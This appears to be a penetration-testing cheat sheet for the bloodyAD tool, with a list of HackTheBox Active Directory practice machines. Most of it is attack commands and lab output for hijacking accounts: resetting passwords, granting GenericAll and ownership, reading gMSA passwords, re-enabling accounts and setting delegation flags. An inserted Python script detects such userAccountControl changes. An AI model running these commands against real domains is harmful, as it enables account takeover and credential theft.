BloodyAD

Retrieve User Information

 

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username

 

Add User To Group

 

bloodyAD --host $dc -d $domain -u $username -p $password add groupMember $group_name $member_to_add

Example:

python3 bloodyAD/bloodyAD.py --host dc01.rebound.htb --dc-ip 10.10.11.231 -u oorend -p '1GR8t@$$4u' -k -d rebound.htb add groupMember "CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB" oorend
[+] oorend added to CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB

 

Change Password

bloodyAD --host $dc -d $domain -u $username -p $password set password $target_username $new_password

Example:

python3 bloodyAD/bloodyAD.py --host dc01.rebound.htb --dc-ip 10.10.11.231 -u oorend -p '1GR8t@$$4u' -k -d rebound.htb set password "winrm_svc" 'pwned123!!!'
[+] Password changed successfully!

 

Give User GenericAll Rights

 

bloodyAD --host $dc -d $domain -u $username -p $password add genericAll $DN $target_username

Example:

python3 bloodyAD/bloodyAD.py --host dc01.rebound.htb --dc-ip 10.10.11.231 -u oorend -p '1GR8t@$$4u' -k -d rebound.htb add genericAll "OU=SERVICE USERS,DC=REBOUND,DC=HTB" oorend
[+] oorend has now GenericAll on OU=SERVICE USERS,DC=REBOUND,DC=HTB

 

WriteOwner

 

bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username

ReadGMSAPassword

 

bloodyAD --host $dc -d $domain -u $username -p $password get object $target_username --attr msDS-ManagedPassword

Enable a Disabled Account

bloodyAD --host $dc -d $domain -u $username -p $password remove uac $target_username -f ACCOUNTDISABLE

Add The TRUSTED_TO_AUTH_FOR_DELEGATION Flag

 

bloodyAD --host $dc -d $domain -u $username -p $password add uac $target_username -f TRUSTED_TO_AUTH_FOR_DELEGATION
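
Both uac commands above change bits in the account's userAccountControl attribute, so a defender can catch them by comparing snapshots of that attribute. The following is an added example, not part of the original page or of bloodyAD: a Python audit that diffs two snapshots and also tracks two related flags (TRUSTED_FOR_DELEGATION, DONT_REQ_PREAUTH). The account names, snapshot values and function names are constructed for illustration.

```python
# Added example (not bloodyAD code): audit userAccountControl changes between snapshots.
# Bit values are the documented userAccountControl flags.
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x00000002,
    "TRUSTED_FOR_DELEGATION": 0x00080000,
    "DONT_REQ_PREAUTH": 0x00400000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x01000000,
}
# Flags whose appearance widens what an account can do or how it can be attacked.
RISKY_WHEN_SET = ("TRUSTED_TO_AUTH_FOR_DELEGATION", "TRUSTED_FOR_DELEGATION", "DONT_REQ_PREAUTH")
DISABLED = UAC_FLAGS["ACCOUNTDISABLE"]

# Constructed sample snapshots: {sAMAccountName: userAccountControl}. 512 = NORMAL_ACCOUNT.
BEFORE = {"alice": 512, "svc_sql": 512, "svc_web": 512 | DISABLED}
AFTER = {
    "alice": 512,
    "svc_sql": 512 | UAC_FLAGS["TRUSTED_TO_AUTH_FOR_DELEGATION"],
    "svc_web": 512,                                       # disabled flag cleared
    "newsvc": 512 | UAC_FLAGS["TRUSTED_FOR_DELEGATION"],  # absent from BEFORE
}


def decode_uac(value):
    """Return the sorted names of the tracked flags set in a UAC integer."""
    return sorted(name for name, bit in UAC_FLAGS.items() if value & bit)


def diff_uac(before, after):
    """Return (account, finding) pairs for risky UAC changes between two snapshots."""
    findings = []
    for account in sorted(after):
        new = after[account]
        # A new account has no earlier state: assume no risky flag was set and keep its
        # disabled bit as-is, so it is never reported as re-enabled.
        old = before.get(account, new & DISABLED)
        for name in RISKY_WHEN_SET:
            bit = UAC_FLAGS[name]
            if new & bit and not old & bit:
                findings.append((account, f"{name} set"))
        if old & DISABLED and not new & DISABLED:
            findings.append((account, "ACCOUNTDISABLE cleared"))
    return findings


if __name__ == "__main__":
    for account, finding in diff_uac(BEFORE, AFTER):
        print(f"{account}: {finding} (now: {decode_uac(AFTER[account])})")
```
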

Notes

  • To use Kerberos, obtain a TGT and then pass -k instead of providing a username and password.
  • You can pass a hash instead of the password.

Resources

Machines To Practice

  • Redelegate (Vulnlab)
  • Vintage (HackTheBox)
  • Infiltrator (HackTheBox)
  • Rebound (HackTheBox)
  • Absolute (HackTheBox)
  • Certified (HackTheBox)

 

HackTheBox AD Machines

 

A list of all Active Directory machines from HackTheBox, sorted by release date, with difficulty levels and direct links to each machine.

Machine Name  | Difficulty | Machine Link
Mantis        | Hard       | Link
Rabbit        | Insane     | Link
Reel          | Hard       | Link
Active        | Easy       | Link
Sizzle        | Insane     | Link
Forest        | Easy       | Link
Resolute      | Medium     | Link
Monteverde    | Medium     | Link
Sauna         | Easy       | Link
Multimaster   | Insane     | Link
Cascade       | Medium     | Link
Blackfield    | Hard       | Link
APT           | Insane     | Link
PivotAPI      | Insane     | Link
Intelligence  | Medium     | Link
Return        | Easy       | Link
Search        | Hard       | Link
Acute         | Hard       | Link
Object        | Hard       | Link
Timelapse     | Easy       | Link
Hathor        | Insane     | Link
StreamIO      | Medium     | Link
Scrambled     | Medium     | Link
Support       | Easy       | Link
Absolute      | Insane     | Link
Flight        | Hard       | Link
Escape        | Medium     | Link
Coder         | Insane     | Link
Rebound       | Insane     | Link
Authority     | Medium     | Link
Manager       | Medium     | Link
Analysis      | Hard       | Link
Office        | Hard       | Link
Mist          | Insane     | Link
Freelancer    | Hard       | Link
Ghost         | Insane     | Link
Infiltrator   | Insane     | Link
Cicada        | Easy       | Link
University    | Insane     | Link
Certified     | Medium     | Link
Administrator | Medium     | Link
Vintage       | Hard       | Link
EscapeTwo     | Easy       | Link
